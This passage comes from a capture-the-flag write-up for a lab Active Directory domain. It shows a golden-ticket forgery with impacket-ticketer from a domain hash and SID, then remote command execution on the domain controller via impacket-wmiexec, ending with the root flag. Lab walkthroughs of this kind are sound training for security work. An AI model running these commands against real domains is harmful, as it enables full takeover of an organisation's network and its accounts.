impacket-ticketer -nthash "0f55cdc40bd8f5814587f7e6b2f85e6f" -domain-sid "S-1-5-21-2986980474-46765180-2505414164" -domain "soupedecode.local" "administrator"
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F4AgT9zRGNHfhSXViOuNU%2FPasted%20image%2020250312072156.png?alt=media&#x26;token=61d3167c-7369-4888-8dc8-0fdf29793400" alt=""><figcaption></figcaption></figure>

We need to export it in the KRB5CCNAME environment variable, and then try to authenticate via impacket-wmiexec:

```bash
export KRB5CCNAME=administrator.ccache
```

```bash
impacket-wmiexec administrator@dc01.soupedecode.local -k -no-pass -dc-ip 10.0.2.33
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F64OwAX9M5QBlA95sI1vH%2FPasted%20image%2020250312073105.png?alt=media&#x26;token=90e21269-6742-4ef7-86ad-4b74207b412d" alt=""><figcaption></figcaption></figure>

We got "clock skew too great" because the time difference between our local machine and the DC is more than 5 minutes, so we can use ntpdate to sync the time and rerun that impacket-wmiexec command.

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FJxn31m3Y1JUp7QFF5z8e%2FPasted%20image%2020250312073117.png?alt=media&#x26;token=ef40f765-9859-4ab0-b458-7ca36756e1e6" alt=""><figcaption></figcaption></figure>

Here is the root flag, you can find the user flag in the websvc home directory.
